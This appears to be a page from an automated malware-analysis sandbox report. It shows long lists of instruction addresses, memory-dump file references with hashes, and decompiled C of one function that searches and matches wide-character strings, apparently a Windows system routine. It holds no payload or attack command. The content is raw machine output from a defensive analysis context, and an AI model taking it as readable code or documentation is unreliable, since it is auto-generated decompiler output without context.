                                                0x00935468
                                                0x00935473
                                                0x00935479
                                                0x0093517c
                                                0x0093517c
                                                0x00000000
                                                0x0093517c
                                                0x0093513f
                                                0x0093514c
                                                0x0093514f
                                                0x00000000
                                                0x00000000
                                                0x0093515c
                                                0x00935161
                                                0x00935167
                                                0x00935171
                                                0x00935173
                                                0x009355ec
                                                0x009355fb
                                                0x009355fb
                                                0x00935179
                                                0x00000000
                                                0x008fe319
                                                0x008fe319
                                                0x008fe31d
                                                0x008fe326
                                                0x008fe32d
                                                0x008fe337
                                                0x008fe33b
                                                0x008fe33e
                                                0x008fe340
                                                0x008fe345
                                                0x0090721f
                                                0x0090721f
                                                0x0090721f
                                                0x00907222
                                                0x00907225
                                                0x00907228
                                                0x0090722a
                                                0x00000000
                                                0x00000000
                                                0x00907230
                                                0x00907230
                                                0x00907237
                                                0x00907237
                                                0x0090723a
                                                0x0090723c
                                                0x0090723f
                                                0x00907242
                                                0x00907245
                                                0x00907248
                                                0x00000000
                                                0x00000000
                                                0x0090724e
                                                0x00907251
                                                0x00907253
                                                0x00000000
                                                0x00000000
                                                0x00907259
                                                0x0090725b
                                                0x00000000
                                                0x00000000
                                                0x0090726d
                                                0x00907275
                                                0x0090727e
                                                0x00907281
                                                0x0090728d
                                                0x00907290
                                                0x00907296
                                                0x009072a1
                                                0x009072a5
                                                0x009072a8
                                                0x0094166e
                                                0x0094166e
                                                0x00941678
                                                0x0094167e
                                                0x00941681
                                                0x00941689
                                                0x0094169b
                                                0x0094169b
                                                0x009416a2
                                                0x009416a2
                                                0x009416a2
                                                0x009416a5
                                                0x00000000
                                                0x009416a5
                                                0x009072ae
                                                0x009072b1
                                                0x00000000
                                                0x00000000
                                                0x009072b7
                                                0x009072b9
                                                0x009072b9
                                                0x009072bc
                                                0x009072c3
                                                0x009072c5
                                                0x00000000
                                                0x00000000
                                                0x009072d0
                                                0x009072d3
                                                0x009072d9
                                                0x009072dc
                                                0x009072df
                                                0x008fe3ff
                                                0x008fe401
                                                0x008fe404
                                                0x008fe404
                                                0x008fe407
                                                0x008fe40c
                                                0x008fe40c
                                                0x009072e5
                                                0x009072e9
                                                0x009629a9
                                                0x009629ad
                                                0x00962988
                                                0x00962988
                                                0x00907304
                                                0x00907307
                                                0x0090730b
                                                0x00000000
                                                0x0090730b
                                                0x009629af
                                                0x009629b1
                                                0x0096297b
                                                0x0096297b
                                                0x0096297d
                                                0x0096297d
                                                0x0096297d
                                                0x00962980
                                                0x00000000
                                                0x00962980
                                                0x009072ef
                                                0x009072fa
                                                0x009072fa
                                                0x00907300
                                                0x00000000
                                                0x00907300
                                                0x00907326
                                                0x00000000
                                                0x0090732a
                                                0x00907331
                                                0x00907331
                                                0x00907337
                                                0x0090733b
                                                0x0090733b
                                                0x0090733d
                                                0x0090733f
                                                0x00907342
                                                0x00907013
                                                0x00907013
                                                0x00907013
                                                0x00907015
                                                0x00907017
                                                0x0090474a
                                                0x0090474e
                                                0x00904751
                                                0x00904753
                                                0x00904759
                                                0x0090475c
                                                0x0090475e
                                                0x0090475e
                                                0x00904753
                                                0x0090701d
                                                0x00907020
                                                0x00907020
                                                0x00907020
                                                0x00907020
                                                0x00907025
                                                0x00907028
                                                0x0090702a
                                                0x00907984
                                                0x00907989
                                                0x00907989
                                                0x0090798b
                                                0x0090798d
                                                0x00000000
                                                0x00000000
                                                0x0092177f
                                                0x00921782
                                                0x00921785
                                                0x00921787
                                                0x0092178a
                                                0x00000000
                                                0x00000000
                                                0x00921792
                                                0x00921795
                                                0x00921797
                                                0x00921799
                                                0x0092179b
                                                0x0092179b
                                                0x009217a1
                                                0x009217a4
                                                0x009217a6
                                                0x009217ab
                                                0x009217ae
                                                0x009217b1
                                                0x009217b4
                                                0x009217b4
                                                0x009217bc
                                                0x009217c1
                                                0x009217c1
                                                0x0090799a
                                                0x0090799e
                                                0x009079a1
                                                0x009418af
                                                0x009418b1
                                                0x009418bd
                                                0x009418bd
                                                0x0090733b
                                                0x0090733d
                                                0x0090733f
                                                0x00907342
                                                0x00000000
                                                0x00907349
                                                0x009079a7
                                                0x009079a9
                                                0x009079ad
                                                0x009079ad
                                                0x009079b3
                                                0x009079b3
                                                0x009079b7
                                                0x00907032
                                                0x00907032
                                                0x00907034
                                                0x00907963
                                                0x00907967
                                                0x00907969
                                                0x0090796b
                                                0x0090796d
                                                0x0090796d
                                                0x00907973
                                                0x00907976
                                                0x009629b6
                                                0x009629bb
                                                0x009629be
                                                0x009629c4
                                                0x00000000
                                                0x009629c4
                                                0x00907879
                                                0x00907879
                                                0x0090704e
                                                0x0090704e
                                                0x00907050
                                                0x00907880
                                                0x00907883
                                                0x00907883
                                                0x00907885
                                                0x00907887
                                                0x00000000
                                                0x00000000
                                                0x0090788d
                                                0x00907890
                                                0x00000000
                                                0x00000000
                                                0x009078a1
                                                0x009078a5
                                                0x009078a7
                                                0x00000000
                                                0x00000000
                                                0x009078a9
                                                0x009078ab
                                                0x009078ab
                                                0x009078ad
                                                0x00000000
                                                0x0090721f
                                                0x0090721f
                                                0x0090721f
                                                0x0090721f
                                                0x00907222
                                                0x00907225
                                                0x00907228
                                                0x0090722a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0090722a
                                                0x00934c6d
                                                0x00934c6d
                                                0x00934c6d
                                                0x00934c78
                                                0x00934c7b
                                                0x00934c7e
                                                0x00934c81
                                                0x00907ea8
                                                0x00907ea8
                                                0x00907ead
                                                0x0090721f
                                                0x0090721f
                                                0x0090721f
                                                0x0090721f
                                                0x00907222
                                                0x00907225
                                                0x00907228
                                                0x0090722a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0090722a
                                                0x00962b96
                                                0x00962b96
                                                0x00962b96
                                                0x00962b9e
                                                0x00962ba0
                                                0x00962ba0
                                                0x00962ba0
                                                0x00962ba4
                                                0x00962bb2
                                                0x00962bb4
                                                0x00962bb6
                                                0x00000000
                                                0x00000000
                                                0x00962bb8
                                                0x00962bbe
                                                0x00962bc2
                                                0x00962bc4
                                                0x00962be5
                                                0x00962be5
                                                0x00962be8
                                                0x00962bec
                                                0x00907ea0
                                                0x00907ea2
                                                0x00907ea2
                                                0x00907ea5
                                                0x00907ea5
                                                0x00000000
                                                0x00907ea5
                                                0x00962bb2
                                                0x00962bb4
                                                0x00962bb6
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00962bb6
                                                0x00962bc6
                                                0x0090721f
                                                0x0090721f
                                                0x0090721f
                                                0x0090721f
                                                0x00907222
                                                0x00907225
                                                0x00907228
                                                0x0090722a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0090722a
                                                0x00907e5f
                                                0x00907e5f
                                                0x00907e5f
                                                0x00907e67
                                                0x00907e69
                                                0x00907e69
                                                0x00907e69
                                                0x00907e6d
                                                0x00907e7b
                                                0x00907e7d
                                                0x00907e7f
                                                0x00934c3d
                                                0x00934c3d
                                                0x00934c40
                                                0x00934c43
                                                0x00000000
                                                0x00000000
                                                0x00934c4f
                                                0x00934c53
                                                0x00934c55
                                                0x00000000
                                                0x00000000
                                                0x00934c5b
                                                0x00934c5d
                                                0x00934c61
                                                0x00934c63
                                                0x00934c65
                                                0x00934c67
                                                0x00934c67
                                                0x00000000
                                                0x00934c63
                                                0x00907e8b
                                                0x00907e8f
                                                0x00907e91
                                                0x0090721f
                                                0x0090721f
                                                0x0090721f
                                                0x00907222
                                                0x00907225
                                                0x00907228
                                                0x0090722a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0090722a
                                                0x0090721f
                                                0x00907e97
                                                0x00907e97
                                                0x00907e9a
                                                0x00907e9a
                                                0x00000000
                                                0x00962bcb
                                                0x00962bcb
                                                0x00962bce
                                                0x00962bd1
                                                0x00000000
                                                0x00000000
                                                0x00962bd9
                                                0x00962bdd
                                                0x00962bdf
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00962bdf
                                                0x00962ba4
                                                0x009078b3
                                                0x009078b3
                                                0x009078b6
                                                0x009078b8
                                                0x009629d0
                                                0x009629d3
                                                0x009629d5
                                                0x009629d7
                                                0x009629d9
                                                0x009629d9
                                                0x009629df
                                                0x009629e2
                                                0x009629f4
                                                0x009629f4
                                                0x009629f9
                                                0x00000000
                                                0x0090721f
                                                0x0090721f
                                                0x0090721f
                                                0x0090721f
                                                0x0090721f
                                                0x0090721f
                                                0x0090721f
                                                0x0090721f
                                                0x0090721f
                                                0x0090721f
                                                0x00907222
                                                0x00907225
                                                0x00907228
                                                0x0090722a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0090722a
                                                0x00000000
                                                0x0090721f
                                                0x009078cb
                                                0x009078d0
                                                0x009078d3
                                                0x009078d5
                                                0x009078d7
                                                0x009078d9
                                                0x009078d9
                                                0x009078df
                                                0x009078e2
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x009078e2
                                                0x009629ff
                                                0x009629ff
                                                0x009629ff
                                                0x00962a01
                                                0x00962a03
                                                0x00000000
                                                0x00000000
                                                0x00962a05
                                                0x00962a08
                                                0x00000000
                                                0x00000000
                                                0x00962a15
                                                0x00962a19
                                                0x00962a1b
                                                0x00000000
                                                0x00000000
                                                0x00962a1d
                                                0x00000000
                                                0x00962a1d
                                                0x00962a21
                                                0x00962a21
                                                0x00000000
                                                0x009078e8
                                                0x009078e8
                                                0x009078e8
                                                0x009078f3
                                                0x009078f3
                                                0x009078f5
                                                0x009078f7
                                                0x00000000
                                                0x00000000
                                                0x009078fd
                                                0x00907900
                                                0x00000000
                                                0x00000000
                                                0x00907911
                                                0x00907915
                                                0x00907917
                                                0x00000000
                                                0x00000000
                                                0x00907919
                                                0x00000000
                                                0x00907919
                                                0x009418ce
                                                0x00000000
                                                0x00962a23
                                                0x00962a23
                                                0x00962a23
                                                0x00962a2b
                                                0x00962a2d
                                                0x00962a2d
                                                0x00962a2d
                                                0x00962a31
                                                0x00962a3f
                                                0x00962a41
                                                0x00962a43
                                                0x00000000
                                                0x00000000
                                                0x00962a45
                                                0x00962a4b
                                                0x00962a4f
                                                0x00962a51
                                                0x00962a72
                                                0x00962a72
                                                0x00962a75
                                                0x00962a79
                                                0x00000000
                                                0x00000000
                                                0x00962a3f
                                                0x00962a41
                                                0x00962a43
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00962a43
                                                0x00000000
                                                0x00962a58
                                                0x00962a58
                                                0x00962a5b
                                                0x00962a5e
                                                0x00000000
                                                0x00000000
                                                0x00962a66
                                                0x00962a6a
                                                0x00962a6c
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00962a6c
                                                0x0090791b
                                                0x0090791b
                                                0x0090791b
                                                0x00907923
                                                0x00907925
                                                0x00907925
                                                0x00907925
                                                0x00907929
                                                0x00907937
                                                0x00907939
                                                0x0090793b
                                                0x009418fd
                                                0x00941900
                                                0x00941903
                                                0x00000000
                                                0x00000000
                                                0x0094190f
                                                0x00941913
                                                0x00941915
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0094191b
                                                0x00907947
                                                0x0090794b
                                                0x0090794d
                                                0x00000000
                                                0x00000000
                                                0x00907953
                                                0x00907953
                                                0x00907956
                                                0x00907956
                                                0x00000000
                                                0x00907212
                                                0x00907212
                                                0x00907215
                                                0x00907215
                                                0x00907215
                                                0x00907217
                                                0x00907217
                                                0x00907e0f
                                                0x00907e14
                                                0x00907e17
                                                0x00907e19
                                                0x00907e1b
                                                0x00907e1d
                                                0x00907e1d
                                                0x00907e23
                                                0x00907e26
                                                0x00000000
                                                0x00000000
                                                0x00907e2c
                                                0x00907e2c
                                                0x00907e37
                                                0x00907e37
                                                0x00907e39
                                                0x00907e3b
                                                0x00000000
                                                0x00000000
                                                0x00907e41
                                                0x00907e44
                                                0x00000000
                                                0x00000000
                                                0x00907e55
                                                0x00907e59
                                                0x00907e5b
                                                0x00000000
                                                0x00000000
                                                0x00907e5d
                                                0x00000000
                                                0x00907e5d
                                                0x009418e4
                                                0x00000000
                                                0x009418e4
                                                0x00000000
                                                0x009629f9
                                                0x009629e4
                                                0x009629e6
                                                0x009629e9
                                                0x009629ec
                                                0x00000000
                                                0x009629ec
                                                0x009078be
                                                0x009078c1
                                                0x009078c1
                                                0x009078c1
                                                0x009078c3
                                                0x009078c3
                                                0x009418c7
                                                0x00000000
                                                0x009418c7
                                                0x00907059
                                                0x0090705d
                                                0x00907063
                                                0x00907063
                                                0x00907066
                                                0x00907066
                                                0x0090706c
                                                0x00907072
                                                0x00907078
                                                0x0090707a
                                                0x00904769
                                                0x0090476f
                                                0x00904772
                                                0x00904778
                                                0x0090477c
                                                0x0090477c
                                                0x00907080
                                                0x00907080
                                                0x00907083
                                                0x00907083
                                                0x0090708d
                                                0x00907098
                                                0x0090709f
                                                0x009070a2
                                                0x009070a4
                                                0x00000000
                                                0x00000000
                                                0x009070aa
                                                0x009070aa
                                                0x009070ac
                                                0x00000000
                                                0x00000000
                                                0x009070b5
                                                0x009070b8
                                                0x009070bc
                                                0x009070be
                                                0x009070be
                                                0x009070be
                                                0x009070c1
                                                0x009070c4
                                                0x009070c9
                                                0x009070cf
                                                0x009070d8
                                                0x009070d9
                                                0x009070df
                                                0x009070e1
                                                0x009070e1
                                                0x009070e1
                                                0x009070eb
                                                0x009070f1
                                                0x00935184
                                                0x00935184
                                                0x009070fc
                                                0x00907102
                                                0x00907104
                                                0x00907106
                                                0x00907108
                                                0x00907108
                                                0x0090710f
                                                0x00907111
                                                0x00934f8a
                                                0x00934f8a
                                                0x0090711d
                                                0x00907125
                                                0x00907127
                                                0x00962a81
                                                0x00962a81
                                                0x0090712d
                                                0x00907132
                                                0x0090713f
                                                0x0090713f
                                                0x00907142
                                                0x00962a8a
                                                0x00962a8a
                                                0x00907148
                                                0x0090714a
                                                0x0090714d
                                                0x00962a92
                                                0x00962a92
                                                0x00907156
                                                0x00907157
                                                0x00907161
                                                0x00907163
                                                0x00907165
                                                0x009418eb
                                                0x009418eb
                                                0x00000000
                                                0x0090716b
                                                0x00907171
                                                0x00907178
                                                0x0090717a
                                                0x00962a98
                                                0x00962a98
                                                0x00907183
                                                0x0090718c
                                                0x00907190
                                                0x00907193
                                                0x00907198
                                                0x0090719a
                                                0x00907f52
                                                0x00907f59
                                                0x00907f5b
                                                0x00907f5d
                                                0x00000000
                                                0x00000000
                                                0x00907f63
                                                0x00000000
                                                0x009071a0
                                                0x009071a0
                                                0x009071a3
                                                0x009071a3
                                                0x009071a5
                                                0x00962bf4
                                                0x00962bfa
                                                0x00000000
                                                0x00962bfa
                                                0x009071ae
                                                0x009071c8
                                                0x009071cd
                                                0x009071d4
                                                0x009071d7
                                                0x009071d7
                                                0x009071d9
                                                0x009071db
                                                0x00000000
                                                0x00000000
                                                0x009071e1
                                                0x009071e4
                                                0x00000000
                                                0x00000000
                                                0x009071f5
                                                0x009071f9
                                                0x009071fb
                                                0x00000000
                                                0x00000000
                                                0x009071fd
                                                0x009071ff
                                                0x009071ff
                                                0x00907201
                                                0x00962b1c
                                                0x00962b1c
                                                0x00962b1f
                                                0x00962b21
                                                0x00962b23
                                                0x00000000
                                                0x00000000
                                                0x00962b25
                                                0x00962b28
                                                0x00000000
                                                0x00000000
                                                0x00962b33
                                                0x00962b37
                                                0x00962b39
                                                0x00000000
                                                0x00000000
                                                0x00962b3b
                                                0x00000000
                                                0x00962b3b
                                                0x00962b94
                                                0x00962b94
                                                0x00000000
                                                0x00962b94
                                                0x00907207
                                                0x0090720a
                                                0x0090720c
                                                0x00962aa1
                                                0x00962aa4
                                                0x00962aa6
                                                0x00962aa8
                                                0x00962aaa
                                                0x00962aaa
                                                0x00962ab0
                                                0x00962ab3
                                                0x00962ac5
                                                0x00962aca
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00962acc
                                                0x00962acc
                                                0x00962acc
                                                0x00962ace
                                                0x00962ad0
                                                0x00000000
                                                0x00000000
                                                0x00962ad2
                                                0x00962ad5
                                                0x00000000
                                                0x00000000
                                                0x00962ae2
                                                0x00962ae6
                                                0x00962ae8
                                                0x00000000
                                                0x00000000
                                                0x00962aea
                                                0x00962af0
                                                0x00962af0
                                                0x00962af2
                                                0x00000000
                                                0x00000000
                                                0x00962af4
                                                0x00962af6
                                                0x00962af6
                                                0x00962af6
                                                0x00962afa
                                                0x00962b08
                                                0x00962b0a
                                                0x00962b0c
                                                0x00962b3f
                                                0x00962b42
                                                0x00962b45
                                                0x00000000
                                                0x00000000
                                                0x00962b4d
                                                0x00962b51
                                                0x00962b53
                                                0x00962b6f
                                                0x00962b73
                                                0x00962b75
                                                0x00962b77
                                                0x00962b79
                                                0x00962b79
                                                0x00962b7f
                                                0x00962b82
                                                0x00000000
                                                0x00000000
                                                0x00962b86
                                                0x00962b89
                                                0x00962b8c
                                                0x00962b8f
                                                0x00962b66
                                                0x00962b66
                                                0x00000000
                                                0x00962b66
                                                0x00000000
                                                0x00962b53
                                                0x00962b14
                                                0x00962b18
                                                0x00962b1a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00962b55
                                                0x00962b55
                                                0x00962b58
                                                0x00962b58
                                                0x00962b60
                                                0x00962b60
                                                0x00962b63
                                                0x00962b63
                                                0x00000000
                                                0x00962b63
                                                0x00962aee
                                                0x00962aee
                                                0x00000000
                                                0x00962aee
                                                0x00962ab7
                                                0x00962aba
                                                0x00962abd
                                                0x00000000
                                                0x00962abd
                                                0x00000000
                                                0x0090720c
                                                0x009418dd
                                                0x00000000
                                                0x009418dd
                                                0x0090719a
                                                0x00907134
                                                0x00907134
                                                0x00907134
                                                0x0090713b
                                                0x0090713b
                                                0x00000000
                                                0x00907134
                                                0x009418d5
                                                0x009418d5
                                                0x00907066
                                                0x0090706c
                                                0x00907072
                                                0x00907078
                                                0x0090707a
                                                0x00904769
                                                0x0090476f
                                                0x00904772
                                                0x00904778
                                                0x0090477c
                                                0x0090477c
                                                0x00907080
                                                0x00907080
                                                0x00907083
                                                0x00907083
                                                0x0090708d
                                                0x00907098
                                                0x0090709f
                                                0x009070a2
                                                0x009070a4
                                                0x00000000
                                                0x00000000
                                                0x009070a4
                                                0x00907066
                                                0x0090703a
                                                0x0090703a
                                                0x0090703a
                                                0x0090703d
                                                0x0090703f
                                                0x00907044
                                                0x00907046
                                                0x00000000
                                                0x00000000
                                                0x00922df1
                                                0x00922df6
                                                0x00922dfa
                                                0x00922dfc
                                                0x00922dfe
                                                0x00922e00
                                                0x00922e00
                                                0x00922e06
                                                0x00922e09
                                                0x00922e1b
                                                0x00922e20
                                                0x00922e23
                                                0x00922e29
                                                0x00000000
                                                0x00922e29
                                                0x00922e0b
                                                0x00922e10
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00922e16
                                                0x0090704c
                                                0x0090704c
                                                0x00000000
                                                0x0090704c
                                                0x00907030
                                                0x00907030
                                                0x00000000
                                                0x00907030
                                                0x0090733b
                                                0x0090721f
                                                0x008fe34b
                                                0x008fe34f
                                                0x008fe34f
                                                0x008fe352
                                                0x008fe354
                                                0x008fe357
                                                0x008fe35a
                                                0x008fe360
                                                0x00000000
                                                0x00000000
                                                0x008fe366
                                                0x008fe36b
                                                0x00000000
                                                0x008fe379
                                                0x008fe385
                                                0x008fe385
                                                0x008fe38b
                                                0x008fe394
                                                0x008fe397
                                                0x008fe3a3
                                                0x008fe3a6
                                                0x008fe3ac
                                                0x008fe3b7
                                                0x008fe3be
                                                0x00935603
                                                0x0093560d
                                                0x00935613
                                                0x00935616
                                                0x0093561e
                                                0x00935630
                                                0x00935630
                                                0x00935637
                                                0x00935637
                                                0x00935637
                                                0x0093563a
                                                0x00000000
                                                0x008fe3cd
                                                0x008fe3cd
                                                0x008fe3cf
                                                0x008fe3cf
                                                0x008fe3d2
                                                0x008fe3db
                                                0x0090731e
                                                0x00000000
                                                0x0090731e
                                                0x008fe3ea
                                                0x008fe3ed
                                                0x008fe3f3
                                                0x008fe3f9
                                                0x009342b8
                                                0x009342bc
                                                0x00000000
                                                0x00000000
                                                0x00962970
                                                0x00962974
                                                0x00000000
                                                0x00962976
                                                0x00962976
                                                0x00962978
                                                0x00000000
                                                0x00962978
                                                0x00000000
                                                0x00962974
                                                0x00000000
                                                0x008fe3f9
                                                0x008fe3be
                                                0x008fe36b
                                                0x00907314
                                                0x00000000
                                                0x00907314

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2149474689.00000000008E0000.00000040.00000001.sdmp, Offset: 008D0000, based on PE: true
                                                • Associated: 00000007.00000002.2149468638.00000000008D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149692494.00000000009C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149700219.00000000009D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149713288.00000000009D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149723271.00000000009D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149730125.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149841483.0000000000A40000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a7d9755af088b22e0c1be47b04b5e348899f934565c82acd0525908fd7cfc0ac
                                                • Instruction ID: ec285016cc5935fd7a6c96e7ed6856aee74580530edf5e5d7be8e485e1ef5c93
                                                • Opcode Fuzzy Hash: a7d9755af088b22e0c1be47b04b5e348899f934565c82acd0525908fd7cfc0ac
                                                • Instruction Fuzzy Hash: 7EC1B070A04619CFDB14CF99C4806ACF7B1FF89324F29826AD965AB391D734AD82DB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 008FFBD7, Relevance: .3, Instructions: 254COMMONCrypto
                                                Download Yara Rule
                                                C-Code - Quality: 90%
                                                			E008FFBD7(signed char _a4, signed short* _a8, unsigned int* _a12, short* _a16) {
				signed int _v8;
				char _v72;
				signed int _v76;
				signed short _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				unsigned short _v100;
				short* _v104;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t113;
				short* _t115;
				unsigned short _t118;
				signed short _t120;
				signed short _t125;
				signed short _t136;
				signed int _t137;
				signed char _t144;
				void* _t145;
				signed int _t146;
				signed int _t147;
				void* _t149;
				signed short _t165;
				signed int _t166;
				signed int _t169;
				void* _t173;
				signed short* _t174;
				signed short _t175;
				short* _t176;
				signed int _t178;
				void* _t181;
				unsigned int* _t182;
				signed short* _t183;
				signed int _t185;

				_t113 =  *0x9d2088; // 0x774fe2a0
				_v8 = _t113 ^ _t185;
				_t115 = _a16;
				_v104 = _t115;
				if(_t115 != 0) {
					 *_t115 = 0;
				}
				_t144 = _a4;
				if((_t144 & 0xfffffff8) != 0 || _t115 == 0) {
					_t116 = 0xc000000d;
				} else {
					_t174 = _a8;
					if(E008FFCF0(0, _t174) >= 0) {
						_t182 = _a12;
						if(E008FFCF0(0, _t182) >= 0) {
							_t118 =  *_t174 & 0x0000ffff;
							_t171 =  *_t182 >> 0x00000001 & 0x0000ffff;
							_v100 = _t118;
							_v84 = _t182[1];
							_t120 = _t118 >> 0x00000001 & 0x0000ffff;
							_v96 = _t144;
							_t13 =  &_v96;
							 *_t13 = _v96 & 1;
							_v80 = _t120;
							_v76 = _t171;
							if( *_t13 == 0) {
								_t38 =  &(_t174[2]); // 0x8ffb00
								_t183 =  *_t38;
								_v92 = 1;
							} else {
								_t17 =  &(_t174[2]); // 0x8ffb00
								_v92 = _v92 | 0xffffffff;
								_t21 = (_t120 & 0x0000ffff) * 2; // 0x8ffafe
								_t183 =  *_t17 + _t21 - 2;
							}
							if((_t144 & 0x00000004) != 0) {
								if(_t171 > 0x20) {
									if(_t120 == 0) {
										goto L18;
									} else {
										_v88 = _t144;
										_v88 = _v88 & 0x00000002;
										while(1) {
											_t146 = E00986428( *_t183 & 0x0000ffff) & 0x0000ffff;
											_t175 = 0;
											if(_v88 == 0) {
												goto L57;
											}
											if(0 < _v76) {
												while(_t146 != E00986428( *(_v84 + (_t175 & 0x0000ffff) * 2) & 0x0000ffff)) {
													_t175 = _t175 + 1;
													if(_t175 < _v76) {
														continue;
													}
													goto L55;
												}
											}
											L55:
											if(_t175 != _v76) {
												L61:
												_v80 = _v80 + 0xffff;
												_t183 =  &(_t183[_v92]);
												if(_v80 != 0) {
													continue;
												}
											} else {
											}
											goto L42;
											L57:
											if(0 < _v76) {
												while(_t146 != E00986428( *(_v84 + (_t175 & 0x0000ffff) * 2) & 0x0000ffff)) {
													_t175 = _t175 + 1;
													if(_t175 < _v76) {
														continue;
													}
													goto L60;
												}
											}
											L60:
											if(_t175 == _v76) {
												goto L61;
											}
											goto L42;
										}
									}
								} else {
									if(0 < _t171) {
										_t176 =  &_v72;
										_t149 = _v84 - _t176;
										_v84 = _t171 & 0x0000ffff;
										do {
											 *_t176 = E00986428( *(_t149 + _t176) & 0x0000ffff);
											_t176 = _t176 + 2;
											_t57 =  &_v84;
											 *_t57 = _v84 - 1;
										} while ( *_t57 != 0);
										_t144 = _a4;
										_t120 = _v80;
									}
									if(_t120 == 0) {
										goto L18;
									} else {
										_t147 = _t144 & 0x00000002;
										while(1) {
											_t136 = E00986428( *_t183 & 0x0000ffff);
											_t165 = 0;
											_t171 = 0;
											_t137 = _t136 & 0x0000ffff;
											if(_t147 == 0) {
												goto L43;
											}
											if(0 < _v76) {
												while(1) {
													_t171 = _t165 & 0x0000ffff;
													if(_t137 ==  *((intOrPtr*)(_t185 + (_t165 & 0x0000ffff) * 2 - 0x44))) {
														goto L41;
													}
													_t165 = _t165 + 1;
													if(_t165 < _v76) {
														continue;
													}
													goto L41;
												}
											}
											L41:
											if(_t165 != _v76) {
												L47:
												_v80 = _v80 + 0xffff;
												_t183 =  &(_t183[_v92]);
												if(_v80 != 0) {
													continue;
												}
											}
											L42:
											_t120 = _v80;
											goto L14;
											L43:
											if(0 < _v76) {
												while(1) {
													_t171 = _t165 & 0x0000ffff;
													if(_t137 ==  *((intOrPtr*)(_t185 + (_t165 & 0x0000ffff) * 2 - 0x44))) {
														goto L46;
													}
													_t165 = _t165 + 1;
													if(_t165 < _v76) {
														continue;
													}
													goto L46;
												}
											}
											L46:
											if(_t165 == _v76) {
												goto L47;
											}
											goto L42;
										}
									}
								}
							} else {
								if(_t171 != 1) {
									if(_t120 == 0) {
										goto L18;
									} else {
										_t178 = _v84;
										_v88 = _t144;
										_v88 = _v88 & 0x00000002;
										do {
											_v76 = _v76 & 0x00000000;
											_t166 =  *_t183 & 0x0000ffff;
											if(_v88 != 0) {
												if(0 < _t171) {
													while(_t166 !=  *((intOrPtr*)(_t178 + (_v76 & 0x0000ffff) * 2))) {
														_v76 = _v76 + 1;
														if(_v76 < _t171) {
															continue;
														}
														goto L70;
													}
												}
												L70:
												if(_v76 != _t171) {
													goto L26;
												} else {
													goto L14;
												}
											} else {
												if(0 < _t171) {
													while(_t166 !=  *((intOrPtr*)(_t178 + (_v76 & 0x0000ffff) * 2))) {
														_v76 = _v76 + 1;
														if(_v76 < _t171) {
															continue;
														}
														goto L25;
													}
												} else {
												}
												L25:
												if(_v76 != _t171) {
													goto L14;
												} else {
													goto L26;
												}
											}
											goto L73;
											L26:
											_t120 = _t120 + 0xffff;
											_t183 =  &(_t183[_v92]);
										} while (_t120 != 0);
										goto L14;
									}
								} else {
									_t169 =  *_v84 & 0x0000ffff;
									if((_t144 & 0x00000002) != 0) {
										if(_t120 == 0) {
											goto L18;
										} else {
											while( *_t183 == _t169) {
												_t171 = _v92;
												_t120 = _t120 + 0xffff;
												_t183 =  &(_t183[_v92]);
												if(_t120 == 0) {
													goto L14;
												} else {
													continue;
												}
												L73:
											}
											goto L14;
										}
									} else {
										if(_t120 == 0) {
											L18:
											_t116 = 0xc0000225;
										} else {
											while( *_t183 != _t169) {
												_t171 = _v92;
												_t120 = _t120 + 0xffff;
												_t183 =  &(_t183[_v92]);
												if(_t120 != 0) {
													continue;
												}
												break;
											}
											L14:
											if(_t120 == 0) {
												goto L18;
											} else {
												_t125 = _t120 + 0xffff + _t120 + 0xffff;
												if(_v96 == 0) {
													_t125 = _v100 - _t125;
												}
												 *_v104 = _t125 & 0x0000ffff;
												_t116 = 0;
											}
										}
									}
								}
							}
						}
					}
				}
				_pop(_t173);
				_pop(_t181);
				_pop(_t145);
				return E008FE1B4(_t116, _t145, _v8 ^ _t185, _t171, _t173, _t181);
				goto L73;
			}








































                                                0x008ffbdf
                                                0x008ffbe6
                                                0x008ffbe9
                                                0x008ffbec
                                                0x008ffbf1
                                                0x008ffbf5
                                                0x008ffbf5
                                                0x008ffbf9
                                                0x008ffc04
                                                0x0092aef0
                                                0x008ffc12
                                                0x008ffc12
                                                0x008ffc1f
                                                0x008ffc25
                                                0x008ffc32
                                                0x008ffc3b
                                                0x008ffc41
                                                0x008ffc47
                                                0x008ffc4d
                                                0x008ffc52
                                                0x008ffc55
                                                0x008ffc59
                                                0x008ffc59
                                                0x008ffc5c
                                                0x008ffc5f
                                                0x008ffc62
                                                0x0092aee5
                                                0x0092aee5
                                                0x0092aee8
                                                0x008ffc68
                                                0x008ffc68
                                                0x008ffc6b
                                                0x008ffc72
                                                0x008ffc72
                                                0x008ffc72
                                                0x008ffc79
                                                0x0095b3c0
                                                0x0095b472
                                                0x00000000
                                                0x0095b478
                                                0x0095b478
                                                0x0095b47b
                                                0x0095b47f
                                                0x0095b488
                                                0x0095b48b
                                                0x0095b492
                                                0x00000000
                                                0x00000000
                                                0x0095b498
                                                0x0095b49a
                                                0x0095b4af
                                                0x0095b4b4
                                                0x00000000
                                                0x00000000
                                                0x00000000
